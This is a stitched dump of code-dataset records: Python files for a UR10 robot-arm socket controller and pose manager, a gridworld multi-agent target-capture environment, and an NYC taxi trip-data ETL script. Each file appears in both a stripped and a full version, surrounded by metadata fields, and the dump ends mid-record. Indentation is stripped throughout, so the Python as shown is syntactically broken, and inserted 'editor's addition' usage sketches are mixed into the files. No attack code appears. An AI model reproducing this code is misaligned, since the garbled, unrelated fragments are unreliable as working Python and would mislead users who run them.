#-------------------------------------------------------------------------------
# Neuromorphic Engineering Group
# Author: Rohan Ghosh, MSc
# Contact:
#-------------------------------------------------------------------------------
# Description: UR10 controller in python
#-------------------------------------------------------------------------------
'''
#-------------------------------------------------------------------------------
from ur10_simulation import ur10_simulator
import os.path
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
#class for managing UR10 poses and
#-------------------------------------------------------------------------------
if __name__ == '__main__':
port = 30003
ip1 = '10.1.1.6'
# ip2 = '10.1.1.6'
import sys
sys.path.append('../iLimb')
buffer_size = 1024
U1 = UR10Controller(ip1)
# U2 = UR10Controller(ip2)
# U1.read_joints()
# print(U1.joints)
# U1.read_joints()
# Sim = ur10_simulator()
# Sim.set_joints(U1.joints)
# U1.xyzR = Sim.joints2pose()
# print(U1.xyzR)
# new_joints = copy(U1.joints)
mult = 1
Sim = ur10_simulator()
U1.do_circular_pivot_motion(-40, 190,"z",3,20)
# time.sleep(3)
U1.do_circular_pivot_motion(40, 190,"z",3,-20)
# time.sleep(3)
U1.do_circular_pivot_motion(-40, 190,"z",3,20)
# time.sleep(3)
U1.do_circular_pivot_motion(-40, 190,"z",3,-20)
# time.sleep(3)
# for i in range(100):
# t1 = time.time()
# # U1.read_joints()
# U1.read_xyz()
# print(time.time() - t1)
# print(U1.joints)
# # time.sleep(5)
# print(U1.xyzR)
#rpy_change = np.deg2rad([0, -10, 0])
# l = iLimbController('COM16')
# l.connect()
# l.control(['thumb','index','middle'],['open']*3,[290]*3)
angle = -10
dist_pivot = 220
grasp_pivot = 25
# #open the fingers
# for i in range(6):
# #new_xyzR = U1.move_rpy_with_constraints(rpy_change, 175)
# #U1.movej(new_xyzR,2)
# # l.control(['thumb','index','middle'],['position']*3,[140,120,120])
# U1.read_joints()
# Sim.set_joints(U1.joints)
# U1.xyzR = Sim.joints2pose()
# old_xyzR = copy(U1.xyzR)
# print(U1.xyzR)
# new_joints = copy(U1.joints)
# new_joints[4] = new_joints[4] + angle
# new_xyzR = U1.move_joints_with_grasp_constraints(new_joints,dist_pivot,grasp_pivot,"z")
# U1.movej(new_xyzR,3)
# time.sleep(3.2)
#close the fingers
# #Bimanual
# l.control(['thumb','index','middle'],['open']*3,[290]*3)
# time.sleep(1)
# U1.movej(old_xyzR,3)
# print(mult, new_joints)
# old_XYZ = copy(U1.xyzR)
# # U2.read_xyz()
# print(U1.xyzR)
# print(old_XYZ)
# # Sim.tcp_vec = U1.xyzR
# mult = 1
# seconds = 2
# for i in range(100):
# Sim.tcp_vec = Sim.position_along_endaxis(-30)
# U1.movej(Sim.tcp_vec,seconds)
# time.sleep(seconds)
# Sim.tcp_vec = Sim.position_along_endaxis(30)
# U1.movej(Sim.tcp_vec,seconds)
# time.sleep(seconds)
# print(Sim.tcp_vec)
# # print(U2.xyzR)
# mult = 1
# for i in range(100):
# U1.xyzR[0] = U1.xyzR[0] + (20*mult)
# # U2.xyzR[0] = U2.xyzR[0] + (20*mult)
# U1.movej(U1.xyzR,1)
# # pause(0.05)
# # U2.movej(U2.xyzR,0.4)
# time.sleep(1)
# mult = mult*(-1)
# print("Joints from port", U.joints)
# Sim.set_joints(U.joints)
# Sim.tcp_vec = Sim.joints2pose()
| 31.756757
| 198
| 0.549787
|
# -*- coding: utf-8 -*-
'''
#-------------------------------------------------------------------------------
# NATIONAL UNIVERSITY OF SINGAPORE - NUS
# SINGAPORE INSTITUTE FOR NEUROTECHNOLOGY - SINAPSE
# Singapore
# URL: http://www.sinapseinstitute.org
#-------------------------------------------------------------------------------
# Neuromorphic Engineering Group
# Author: Rohan Ghosh, MSc
# Contact:
#-------------------------------------------------------------------------------
# Description: UR10 controller in python
#-------------------------------------------------------------------------------
'''
#-------------------------------------------------------------------------------
import socket
import numpy as np
from ur10_simulation import ur10_simulator
import time
import struct
import binascii
from copy import copy
import os.path
#-------------------------------------------------------------------------------
class UR10Controller:
def __init__(self, ip,port_recv = 30003, port_send=30002, buffer_size=1024):
self.port_send = port_send
self.port_recv = port_recv
self.ip = ip
self.buffer_size = buffer_size
self.joints = np.zeros((6))
self.xyzR = np.zeros((6))
self.timer_start = time.time()
self.connect()
self.read_start = copy(self.read_time())
self.read_timer = 0
def connect(self):
self.urcont_send = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.urcont_recv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.urcont_send.connect((self.ip,self.port_send))
self.urcont_recv.connect((self.ip,self.port_recv))
def disconnect(self):
self.urcont_send.close()
def read_time(self):
packet_1 = self.urcont_recv.recv(4)
packet_2 = self.urcont_recv.recv(8)
packet_3 = self.urcont_recv.recv(1048)
Time = self.get_xyzR(packet_2)
return Time
def movej(self,posevec,t):
X = 0.001*posevec[0]
Y = 0.001*posevec[1]
Z = 0.001*posevec[2]
Rx = posevec[3]
Ry = posevec[4]
Rz = posevec[5]
cmd = "movej(p[" + str(X) + "," + str(Y) + "," + str(Z) + "," + str(Rx) + "," + str(Ry) + "," + str(Rz) + "], t =" + str(t) + ")\n"
# print(cmd)
# a = input("")
cmd = bytes(cmd, 'utf-8')
self.urcont_send.send(cmd)
def movejoint(self,jointvec,t):
cmd = "movej([" + str(jointvec[0]) + "," + str(jointvec[1]) + "," + str(jointvec[2]) + "," + str(jointvec[3]) + "," + str(jointvec[4]) + "," + str(jointvec[5]) + "], t =" + str(t) + ") \n"
cmd = bytes(cmd, 'utf-8')
self.urcont_send.send(cmd)
def stopj(self,a = 2):
        cmd = "stopj(" + str(a) + ")\n"
        cmd = bytes(cmd, 'utf-8')  # encode like the other commands before sending
        self.urcont_send.send(cmd)
def clear_buffer(self):
#t1 = time.time()
self.timer_current = copy(time.time()) - self.timer_start
t1 = time.time()
while 1:
time.sleep(0.00001)
T = self.read_time()
self.read_timer = T - self.read_start
if self.timer_current - self.read_timer <0.05:
break
#t2 = time.time() - t1
def read_xyz(self):
#time.sleep(0.05)
self.clear_buffer()
#time.sleep(0.05)
packet_1 = self.urcont_recv.recv(4)
packet_2 = self.urcont_recv.recv(8)
self.read_timer = self.get_xyzR(packet_2) - self.read_start
self.timer_current = time.time() - self.timer_start
packet_3 = self.urcont_recv.recv(48)
packet_4 = self.urcont_recv.recv(48)
packet_5 = self.urcont_recv.recv(48)
packet_6 = self.urcont_recv.recv(48)
packet_7 = self.urcont_recv.recv(48)
packet_8 = self.urcont_recv.recv(48)
packet_9 = self.urcont_recv.recv(48)
packet_10 = self.urcont_recv.recv(48)
packet_11 = self.urcont_recv.recv(48)
for i in range(6):
packet = self.urcont_recv.recv(8)
if i<3:
self.xyzR[i] = self.get_xyzR(packet)*1000
else:
self.xyzR[i] = self.get_xyzR(packet)
useless = self.urcont_recv.recv(568)
def get_joint(self,packet):
#x = packet[0:8].encode("hex")
#x = binascii.hexlify(packet[0:8].encode('utf8'))
x = packet[0:8].hex()
y = str(x)
y = struct.unpack('!d', bytes.fromhex(y))[0]
val = y * (180.0/3.1419)
return val
def get_xyzR(self,packet):
#x = packet[0:8].encode("hex")
#x = binascii.hexlify(packet[0:8].encode('utf8'))
x = packet[0:8].hex()
y = str(x)
y = struct.unpack('!d', bytes.fromhex(y))[0]
val = y
return val
def read_joints(self):
t1 = time.time()
self.clear_buffer()
print("Time to learn",time.time() - t1)
#time.sleep(0.05)
packet_1 = self.urcont_recv.recv(4)
packet_2 = self.urcont_recv.recv(8)
self.read_timer = self.get_xyzR(packet_2) - self.read_start
self.timer_current = time.time() - self.timer_start
packet_3 = self.urcont_recv.recv(48)
packet_4 = self.urcont_recv.recv(48)
packet_5 = self.urcont_recv.recv(48)
packet_6 = self.urcont_recv.recv(48)
packet_7 = self.urcont_recv.recv(48)
for i in range(6):
packet = self.urcont_recv.recv(8)
self.joints[i] = self.get_joint(packet)
useless = self.urcont_recv.recv(760)
def read_joints_and_xyzR(self):
self.clear_buffer()
# time.sleep(0.05)
packet_1 = self.urcont_recv.recv(4)
packet_2 = self.urcont_recv.recv(8)
packet_3 = self.urcont_recv.recv(48)
packet_4 = self.urcont_recv.recv(48)
packet_5 = self.urcont_recv.recv(48)
packet_6 = self.urcont_recv.recv(48)
packet_7 = self.urcont_recv.recv(48)
for i in range(6):
packet = self.urcont_recv.recv(8)
self.joints[i] = self.get_joint(packet)
packet_9 = self.urcont_recv.recv(48)
packet_10 = self.urcont_recv.recv(48)
packet_11 = self.urcont_recv.recv(48)
for i in range(6):
packet = self.urcont_recv.recv(8)
if i < 3:
self.xyzR[i] = self.get_xyzR(packet)*1000
else:
self.xyzR[i] = self.get_xyzR(packet)
useless = self.urcont_recv.recv(568)
def move_joint_with_constraints(self, joints_vec, dist_pivot):
#joints_vec is in degrees
# self.read_joints_and_xyzR()
self.read_joints()
# time.sleep(0.5)
self.read_xyz()
S1 = ur10_simulator()
S1.set_joints(self.joints)
S1.tcp_vec = S1.joints2pose()
S1.set_tcp(self.xyzR)
pivot_curr,unit_vector = copy(S1.position_along_endaxis(dist_pivot))
# print(pivot_curr)
S1.set_joints(joints_vec)
S1.tcp_vec = copy(S1.joints2pose())
pivot_new,unit_vector = copy(S1.position_along_endaxis(dist_pivot))
xyz_shift = pivot_curr[0:3] - pivot_new[0:3]
new_xyzR = copy(S1.tcp_vec)
new_xyzR[0:3] = np.add(S1.tcp_vec[0:3],xyz_shift)
S1.tcp_vec = copy(new_xyzR)
# print(S1.position_along_endaxis(dist_pivot))
return new_xyzR
def move_joints_with_grasp_constraints(self, joints_vec, dist_pivot,grasp_pivot,constant_axis):
self.read_joints()
# time.sleep(0.5)
self.read_xyz()
S1 = ur10_simulator()
S1.set_joints(self.joints)
S1.tcp_vec = S1.joints2pose()
S1.set_tcp(self.xyzR)
pivot_curr,unit_vector = copy(S1.grasp_position_endaxis(dist_pivot,grasp_pivot,constant_axis))
# print(pivot_curr)
S1.set_joints(joints_vec)
S1.tcp_vec = copy(S1.joints2pose())
pivot_new,unit_vector = copy(S1.grasp_position_endaxis(dist_pivot,grasp_pivot,constant_axis))
xyz_shift = pivot_curr[0:3] - pivot_new[0:3]
new_xyzR = copy(S1.tcp_vec)
new_xyzR[0:3] = np.add(S1.tcp_vec[0:3],xyz_shift)
S1.tcp_vec = copy(new_xyzR)
# print(S1.position_along_endaxis(dist_pivot))
return new_xyzR
def circular_pivot_motion(self, angle, dist_pivot,axis):
self.read_joints()
# time.sleep(0.5)
self.read_xyz()
S1 = ur10_simulator()
S1.set_joints(self.joints)
S1.tcp_vec = S1.joints2pose()
S1.set_tcp(self.xyzR)
pivot_curr,unit_vector = copy(S1.position_along_endaxis(dist_pivot))
pivot_new = S1.circular_motion(dist_pivot,angle,axis)
xyz_shift = pivot_curr[0:3] - pivot_new[0:3]
new_xyzR = copy(S1.tcp_vec)
new_xyzR[0:3] = np.add(S1.tcp_vec[0:3],xyz_shift)
S1.tcp_vec = copy(new_xyzR)
return new_xyzR
def do_circular_pivot_motion(self, angle, dist_pivot,axis,t,correction):
Sim = ur10_simulator()
self.read_joints()
wrist1 = copy(self.joints[5])
print("Wrist_old",wrist1)
Sim.set_joints(self.joints)
useless = copy(Sim.joints2pose())
new_xyzR = self.circular_pivot_motion(angle,dist_pivot,axis)
self.movej(new_xyzR,t)
time.sleep(t + 0.2)
self.read_joints()
newjoints = copy(self.joints)
# newjoints[5] = wrist1+correction
newjoints[5] = newjoints[5] + correction
self.movejoint(np.deg2rad(newjoints),2)
time.sleep(2.1)
self.read_joints()
print("Wrist_new",self.joints[5])
#-------------------------------------------------------------------------------
#class for managing UR10 poses and
class URPoseManager():
def __init__(self):
#PROPERTY FOR MANAGING POSES (POSITIONS OR JOINTS)
self.dictKeys = list() #list containing the names of positions/joints
self.dictPosJoints = dict() #dictionary
self.dictRelativePos = dict() #dictionary for relative positions
#MANAGING POSES (POSITIONS OR JOINTS)
#save pose file
#filename should contain the full path for the file
def save(self,filename):
#open the file stream
f = open(filename,'w')
#loop through all the keys
for k in range(len(self.dictKeys)):
key = self.dictKeys[k]
value = self.dictPosJoints[key]
f.write(key + ' ' + value[0] + ' ')
[f.write(str(v)+' ') for v in value[1]]
f.write('\n')
f.close()
#load pose file
#filename should contain the full path for the file
def load(self,filename):
if os.path.isfile(filename):
with open(filename) as f:
lines = f.readlines()
#clear the current keys
self.dictKeys = list()
#clear the current dictionary
self.dictPosJoints = dict()
#for every line, split the string by new line and spaces
#the actual data will be stored as a list where each position
#will correspond to a position/joint in the file
data = [l.split('\n')[0].split(' ') for l in lines]
#save all the dictionary keys
self.dictKeys = [str(d[0]) for d in data]
#update the dictionary
#loop through all the keys
for k in range(len(self.dictKeys)):
print('loop')
posevec = [float(x) for x in data[k][2:8]]
value = [data[k][1],posevec]
self.dictPosJoints[self.dictKeys[k]] = value
#print(self.dictKeys) #debugging
#print(self.dictPosJoints) #debugging
return True #successfuly managed to load the files
else:
return False #could not find the file
#move the UR robot to the specified pose
def moveUR(self,urobj,name,time):
if name in self.dictKeys and name in self.dictPosJoints and isinstance(urobj,UR10Controller):
if self.dictPosJoints[name][0] == 'p':
urobj.movej(self.dictPosJoints[name][1],time)
elif self.dictPosJoints[name][0] == 'j':
urobj.movejoint(self.dictPosJoints[name][1],time)
return True
else:
return False
#get pose names
def getPoseNames(self):
return copy(self.dictKeys)
#get the joint position
def getPosJoint(self,name):
if name in self.dictKeys and name in self.dictPosJoints:
return copy(self.dictPosJoints[name][1])
else:
return False #could not find the name
#adding a new position
#WARNING: Adding a new position with the same name will overwrite any
#previous entry
#WARNING: position should be in m!!
#WARNING: joints should be in radians!!
def addPosition(self,name,position):
if not name in self.dictKeys:
self.dictKeys.append(name)
self.dictPosJoints[name] = ['p',position]
return True
#adding a new joint
#WARNING: Adding a new joint with the same name will overwrite any
#previous entry
#WARNING: joints should be in radians!!
def addJoint(self,name,joint):
if not name in self.dictKeys:
self.dictKeys.append(name)
self.dictPosJoints[name] = ['j',joint]
return True
#removing a position/joint
def removePosJoint(self,name):
if name in self.dictKeys and name in self.dictPosJoints:
del(self.dictKeys[self.dictKeys.index(name)])
del(self.dictPosJoints[name])
return True
else:
return False
#this function remaps all the positions that have been saved to a new
#home position. necessary when remapping has changed. as long as it is
#possible to create positions relative to an origin or home position, this
#method can be used to convert all the stored positions to new values
#based on a new origin
#def conv2newHome(self,_home):
# print('ok')
#-------------------------------------------------------------------------------
if __name__ == '__main__':
port = 30003
ip1 = '10.1.1.6'
# ip2 = '10.1.1.6'
import os,sys
sys.path.append('../iLimb')
from iLimb import *
buffer_size = 1024
U1 = UR10Controller(ip1)
# U2 = UR10Controller(ip2)
# U1.read_joints()
# print(U1.joints)
# U1.read_joints()
# Sim = ur10_simulator()
# Sim.set_joints(U1.joints)
# U1.xyzR = Sim.joints2pose()
# print(U1.xyzR)
# new_joints = copy(U1.joints)
mult = 1
Sim = ur10_simulator()
U1.do_circular_pivot_motion(-40, 190,"z",3,20)
# time.sleep(3)
U1.do_circular_pivot_motion(40, 190,"z",3,-20)
# time.sleep(3)
U1.do_circular_pivot_motion(-40, 190,"z",3,20)
# time.sleep(3)
U1.do_circular_pivot_motion(-40, 190,"z",3,-20)
# time.sleep(3)
# for i in range(100):
# t1 = time.time()
# # U1.read_joints()
# U1.read_xyz()
# print(time.time() - t1)
# print(U1.joints)
# # time.sleep(5)
# print(U1.xyzR)
#rpy_change = np.deg2rad([0, -10, 0])
# l = iLimbController('COM16')
# l.connect()
# l.control(['thumb','index','middle'],['open']*3,[290]*3)
angle = -10
dist_pivot = 220
grasp_pivot = 25
# #open the fingers
# for i in range(6):
# #new_xyzR = U1.move_rpy_with_constraints(rpy_change, 175)
# #U1.movej(new_xyzR,2)
# # l.control(['thumb','index','middle'],['position']*3,[140,120,120])
# U1.read_joints()
# Sim.set_joints(U1.joints)
# U1.xyzR = Sim.joints2pose()
# old_xyzR = copy(U1.xyzR)
# print(U1.xyzR)
# new_joints = copy(U1.joints)
# new_joints[4] = new_joints[4] + angle
# new_xyzR = U1.move_joints_with_grasp_constraints(new_joints,dist_pivot,grasp_pivot,"z")
# U1.movej(new_xyzR,3)
# time.sleep(3.2)
#close the fingers
# #Bimanual
# l.control(['thumb','index','middle'],['open']*3,[290]*3)
# time.sleep(1)
# U1.movej(old_xyzR,3)
# print(mult, new_joints)
# old_XYZ = copy(U1.xyzR)
# # U2.read_xyz()
# print(U1.xyzR)
# print(old_XYZ)
# # Sim.tcp_vec = U1.xyzR
# mult = 1
# seconds = 2
# for i in range(100):
# Sim.tcp_vec = Sim.position_along_endaxis(-30)
# U1.movej(Sim.tcp_vec,seconds)
# time.sleep(seconds)
# Sim.tcp_vec = Sim.position_along_endaxis(30)
# U1.movej(Sim.tcp_vec,seconds)
# time.sleep(seconds)
# print(Sim.tcp_vec)
# # print(U2.xyzR)
# mult = 1
# for i in range(100):
# U1.xyzR[0] = U1.xyzR[0] + (20*mult)
# # U2.xyzR[0] = U2.xyzR[0] + (20*mult)
# U1.movej(U1.xyzR,1)
# # pause(0.05)
# # U2.movej(U2.xyzR,0.4)
# time.sleep(1)
# mult = mult*(-1)
# print("Joints from port", U.joints)
# Sim.set_joints(U.joints)
# Sim.tcp_vec = Sim.joints2pose()
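# --- Illustrative usage sketch (editor's addition, not part of the source file) ---
# A minimal sketch of the URPoseManager defined above: store a named pose, persist it
# and reload it. The pose values and file name are placeholders; the robot lines are
# left commented because they require a reachable UR10 at the given IP.
manager = URPoseManager()
manager.addPosition('home', [400.0, -200.0, 300.0, 0.0, 3.14, 0.0])  # position in mm, rotation vector in rad
manager.save('poses.txt')
manager.load('poses.txt')
# ur = UR10Controller('10.1.1.6')   # placeholder robot IP
# manager.moveUR(ur, 'home', 5)     # move to the stored pose over 5 seconds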
| 0
| 0
| 0
| 13,301
| 0
| 0
| 0
| -34
| 210
|
072d2914c7508a4a27885c88e7923aafdfe723a6
| 4,133
|
py
|
Python
|
src/rlmamr/my_env/capture_target_MA_core.py
|
yuchen-x/CoRL2019
|
d482a90441bc8eb0461f1f22fbd65d96584f6914
|
[
"MIT"
] | 2
|
2020-02-05T04:17:03.000Z
|
2021-05-24T04:07:36.000Z
|
src/rlmamr/my_env/capture_target_MA_core.py
|
yuchen-x/CoRL2019
|
d482a90441bc8eb0461f1f22fbd65d96584f6914
|
[
"MIT"
] | null | null | null |
src/rlmamr/my_env/capture_target_MA_core.py
|
yuchen-x/CoRL2019
|
d482a90441bc8eb0461f1f22fbd65d96584f6914
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
import numpy as np
NORTH = np.array([0, 1])
SOUTH = np.array([0, -1])
WEST = np.array([-1, 0])
EAST = np.array([1, 0])
STAY = np.array([0, 0])
TRANSLATION_TABLE = [
# [left, intended_direction, right]
[WEST, NORTH, EAST],
[EAST, SOUTH, WEST],
[SOUTH, WEST, NORTH],
[NORTH, EAST, SOUTH],
[STAY, STAY, STAY]
]
DIRECTION = np.array([[0.0, 1.0],
[0.0, -1.0],
[-1.0, 0.0],
[1.0, 0.0],
[0.0, 0.0]])
| 33.064
| 140
| 0.581176
|
#!/usr/bin/python
import numpy as np
import IPython
from IPython.core.debugger import set_trace
NORTH = np.array([0, 1])
SOUTH = np.array([0, -1])
WEST = np.array([-1, 0])
EAST = np.array([1, 0])
STAY = np.array([0, 0])
TRANSLATION_TABLE = [
# [left, intended_direction, right]
[WEST, NORTH, EAST],
[EAST, SOUTH, WEST],
[SOUTH, WEST, NORTH],
[NORTH, EAST, SOUTH],
[STAY, STAY, STAY]
]
DIRECTION = np.array([[0.0, 1.0],
[0.0, -1.0],
[-1.0, 0.0],
[1.0, 0.0],
[0.0, 0.0]])
class Agent(object):
    """A base class for an agent whose movement path is generated using an A*-like algorithm."""
def __init__(self, idx, grid_dim, agent_trans_noise=0.1):
self.idx = idx
self.grid_dim = grid_dim
self.x_len, self.y_len = self.grid_dim
self.position = self.rand_position(*self.grid_dim)
self.agt_trans_noise = agent_trans_noise
self.cur_action = None
self.cur_action_time_left = 0.0
self.cur_action_done = True
def step(self, action, goal):
raise NotImplementedError
def astar_move(self, goal):
moves = self.wrap_positions(DIRECTION + self.position)
h = np.linalg.norm(goal-moves, axis=1)
dest_idx = np.random.choice(np.where(h == h.min())[0], size=1)[0]
trans = TRANSLATION_TABLE[dest_idx][np.random.choice(3, p=[self.agt_trans_noise/2, 1-self.agt_trans_noise, self.agt_trans_noise/2])]
self.position = (self.position+trans) % self.x_len
dist = np.linalg.norm(goal - self.position)
if dist < 0.1:
self.cur_action_done = True
self.cur_action_time_left = 0.0
############################################################################
# helper functions
def _get_position_from_one_hot(self, goal):
index = goal.nonzero()[0]
X = index % self.x_len
Y = index // self.x_len
return np.concatenate([X,Y])
def _get_position_from_normalized(self, goal):
if all(goal[2:] == -1):
return goal[2:]
else:
return goal[2:] * self.x_len
@staticmethod
def rand_position(x_range, y_range):
return np.array([np.random.randint(x_range), np.random.randint(y_range)])
def wrap_positions(self, positions):
X, Y = np.split(positions,2,axis=1)
return np.concatenate([X%self.x_len, Y%self.y_len], axis=1)
class Agent_v1(Agent):
    """Move_To_Target macro-action that terminates on reaching the goal.
    The low-level controller automatically sets the latest
    observed target position as the goal. If the target is flickering, the
    previously observed target location continues to be used."""
def __init__(self, idx, grid_dim, agent_trans_noise=0.1):
super(Agent_v1, self).__init__(idx, grid_dim, agent_trans_noise=agent_trans_noise)
self.pre_goal = np.array([-1,-1])
def step(self, action, goal):
"""Depends on the input macro-action to run low-level controller to achieve
primitive action execution.
"""
if self.cur_action_done:
self.cur_action = action
else:
action = self.cur_action
self.cur_action_done = False
self.cur_action_time_left = -1.0
if action == 1:
self.cur_action_done = True
self.cur_action_time_left = 0.0
else:
if len(goal) > len(self.grid_dim) * 2:
goal = self._get_position_from_one_hot(goal[self.x_len*self.y_len:])
else:
goal = self._get_position_from_normalized(goal)
            # target is flickering: move towards the target position from the previous observation
if all(goal==-1):
if all(self.pre_goal==-1):
self.cur_action_done = True
self.cur_action_time_left = 0.0
else:
self.astar_move(self.pre_goal)
else:
self.astar_move(goal)
self.pre_goal = goal
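# --- Illustrative usage sketch (editor's addition, not part of the source file) ---
# A minimal sketch of stepping Agent_v1 on a 5x5 grid using the normalized observation
# format handled by _get_position_from_normalized above: the last two entries are the
# target position divided by the grid size, or -1 when the target is not observed.
# The observation layout is inferred from the code, so treat it as an assumption.
import numpy as np

agent = Agent_v1(idx=0, grid_dim=(5, 5), agent_trans_noise=0.1)
goal_obs = np.array([0.2, 0.2, 0.6, 0.6])   # agent near (1, 1), target at (3, 3), normalized
agent.step(action=0, goal=goal_obs)          # action 1 would end the macro-action immediately
print(agent.position, agent.cur_action_done)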
| 0
| 115
| 0
| 3,379
| 0
| 0
| 0
| 15
| 91
|
87af048da678fa17419acdfe0ee36bfcb3064335
| 4,026
|
py
|
Python
|
src/python/packages/study/__main__.py
|
djrlj694/nyc-taxi-analysis
|
0d62cc56594ef9260580c9e6c203e9fbde6fee24
|
[
"MIT"
] | null | null | null |
src/python/packages/study/__main__.py
|
djrlj694/nyc-taxi-analysis
|
0d62cc56594ef9260580c9e6c203e9fbde6fee24
|
[
"MIT"
] | null | null | null |
src/python/packages/study/__main__.py
|
djrlj694/nyc-taxi-analysis
|
0d62cc56594ef9260580c9e6c203e9fbde6fee24
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""
__main__.py - The main module for processing data and creating visual summaries
for this study.
"""
import os
import sys
from pathlib import Path
import ui.cli as cli
from file import YAMLFile
# =========================================================================== #
# METADATA
# =========================================================================== #
__author__ = 'Robert (Bob) L. Jones'
__credits__ = ['Robert (Bob) L. Jones']
__created_date__ = 'Dec 29, 2020'
__modified_date__ = 'Dec 30, 2020'
# =========================================================================== #
# EXPORTS
# =========================================================================== #
# Define the module's API -- the list of exportable objects (classes,
# functions, etc.) -- when performing a "wild import" (`from field import *`).
__all__ = [
'DEBUG',
]
# =========================================================================== #
# CONSTANTS
# =========================================================================== #
# -- Debugging -- #
DEBUG = bool(os.getenv('DEBUG', default=False))
# -- Filesytem -- #
PREFIX = Path(os.getenv('PREFIX', default='.')).resolve()
DATA_DIR = PREFIX / 'data'
SOURCE_DIR = DATA_DIR / '01_raw'
RESULTS_DIR = PREFIX / 'results'
SOURCE_FILE = '%s_tripdata_%4d-%02d.csv'
# -- URLs -- #
SOURCE_URL = 'https://s3.amazonaws.com/nyc-tlc/trip+data'
# =========================================================================== #
# FUNCTIONS
# =========================================================================== #
# -- Data Analytics -- #
# -- Data Processing: Extract -- #
# -- Data Processing: Transform -- #
# -- Data Processing: Load -- #
# -- Utilities -- #
# -- Main Program -- #
def main():
"""
Runs the main set of functions that define the program.
"""
# Confirm debugging state.
DEBUG and print('DEBUG =', DEBUG)
# Confirm Python path.
DEBUG and print('sys.path =', sys.path)
# Print constants.
DEBUG and print('PREFIX =', PREFIX)
# Print CLI option values.
DEBUG and print('args.config =', args.config) # Ex: etc/settings/etl.cfg
# Read a configuration file.
cfg = YAMLFile(args.config).load()
DEBUG and print('cfg =', cfg)
DEBUG and print('type(cfg) =', type(cfg))
# Create a mini configuration dictionary.
sources_cfg = cfg['sources']
extract_data(sources_cfg)
# df = extract_data()
# df = transform_data(df)
# visualize_data(df)
# =========================================================================== #
# MAIN EXECUTION
# =========================================================================== #
# -- CLI option processing -- #
args = cli.read_args()
# -- Main Program -- #
# If this module is in the main module, call the main() function.
if __name__ == '__main__':
main()
# -- Housekeeping -- #
# Exit the program normally (i.e., with a POSIX exit code of 0).
sys.exit(0)
| 22.617978
| 79
| 0.513164
|
#!/usr/bin/env python3
"""
__main__.py - The main module for processing data and creating visual summaries
for this study.
"""
import os
import sys
from pathlib import Path
import etl
import pandas as pd
import ui.cli as cli
from file import YAMLFile
# =========================================================================== #
# METADATA
# =========================================================================== #
__author__ = 'Robert (Bob) L. Jones'
__credits__ = ['Robert (Bob) L. Jones']
__created_date__ = 'Dec 29, 2020'
__modified_date__ = 'Dec 30, 2020'
# =========================================================================== #
# EXPORTS
# =========================================================================== #
# Define the module's API -- the list of exportable objects (classes,
# functions, etc.) -- when performing a "wild import" (`from field import *`).
__all__ = [
'DEBUG',
]
# =========================================================================== #
# CONSTANTS
# =========================================================================== #
# -- Debugging -- #
DEBUG = bool(os.getenv('DEBUG', default=False))
# -- Filesytem -- #
PREFIX = Path(os.getenv('PREFIX', default='.')).resolve()
DATA_DIR = PREFIX / 'data'
SOURCE_DIR = DATA_DIR / '01_raw'
RESULTS_DIR = PREFIX / 'results'
SOURCE_FILE = '%s_tripdata_%4d-%02d.csv'
# -- URLs -- #
SOURCE_URL = 'https://s3.amazonaws.com/nyc-tlc/trip+data'
# =========================================================================== #
# FUNCTIONS
# =========================================================================== #
# -- Data Analytics -- #
def visualize_data(df: pd.DataFrame):
pass
# Debug data frame.
DEBUG and preview(df, visualize_data.__name__)
# Return data frame for reuse.
return df
# -- Data Processing: Extract -- #
def extract_data(config: dict):
# Define an inner function to extract source data files.
def extract_files(type: str):
source.extract_files(
type,
config[type]['start_date'],
config[type]['end_date'],
)
# Create source.
source = etl.Source(SOURCE_FILE, SOURCE_URL, SOURCE_DIR)
# Extract trip records.
extract_files('yellow') # Yellow Taxi
extract_files('green') # Green Taxi
extract_files('fhv') # For-Hire Vehicle
extract_files('fhvhv') # High Volume For-Hire Vehicle
# -- Data Processing: Transform -- #
# -- Data Processing: Load -- #
# -- Utilities -- #
def percent(num, denom):
return 100 * num / denom
def preview(df: pd.DataFrame, func_name: str):
print(f'INSIDE {func_name}(): type =', type(df).__name__)
print(df.head(5))
def zScore(x, mean, std):
return (x - mean) / std
# -- Main Program -- #
def main():
"""
Runs the main set of functions that define the program.
"""
# Confirm debugging state.
DEBUG and print('DEBUG =', DEBUG)
# Confirm Python path.
DEBUG and print('sys.path =', sys.path)
# Print constants.
DEBUG and print('PREFIX =', PREFIX)
# Print CLI option values.
DEBUG and print('args.config =', args.config) # Ex: etc/settings/etl.cfg
# Read a configuration file.
cfg = YAMLFile(args.config).load()
DEBUG and print('cfg =', cfg)
DEBUG and print('type(cfg) =', type(cfg))
# Create a mini configuration dictionary.
sources_cfg = cfg['sources']
extract_data(sources_cfg)
# df = extract_data()
# df = transform_data(df)
# visualize_data(df)
# =========================================================================== #
# MAIN EXECUTION
# =========================================================================== #
# -- CLI option processing -- #
args = cli.read_args()
# -- Main Program -- #
# If this module is in the main module, call the main() function.
if __name__ == '__main__':
main()
# -- Housekeeping -- #
# Exit the program normally (i.e., with a POSIX exit code of 0).
sys.exit(0)
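# --- Illustrative config sketch (editor's addition, not part of the source file) ---
# extract_data() above reads cfg['sources'][<type>]['start_date'] and ['end_date'] for
# the four trip-record types it extracts. A configuration of the shape below would
# satisfy that; the concrete date values and their format are placeholders, and any
# further keys the real etc/settings/etl.cfg file may contain are not shown here.
EXAMPLE_SOURCES_CFG = {
    'yellow': {'start_date': '2020-01', 'end_date': '2020-03'},
    'green':  {'start_date': '2020-01', 'end_date': '2020-03'},
    'fhv':    {'start_date': '2020-01', 'end_date': '2020-03'},
    'fhvhv':  {'start_date': '2020-01', 'end_date': '2020-03'},
}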
| 0
| 0
| 0
| 0
| 0
| 871
| 0
| -13
| 160
|
dcfb93be50b868f85e2e53dee2d5dd941c95ec50
| 4,100
|
py
|
Python
|
ssa_sim_v2/simulator/modules/auction_attributes/auction_attributes_base_module.py
|
donghun2018/adclick-simulator-v2
|
ade886e9dcbde9fcea218a19f0130cc09f81e55e
|
[
"MIT"
] | null | null | null |
ssa_sim_v2/simulator/modules/auction_attributes/auction_attributes_base_module.py
|
donghun2018/adclick-simulator-v2
|
ade886e9dcbde9fcea218a19f0130cc09f81e55e
|
[
"MIT"
] | null | null | null |
ssa_sim_v2/simulator/modules/auction_attributes/auction_attributes_base_module.py
|
donghun2018/adclick-simulator-v2
|
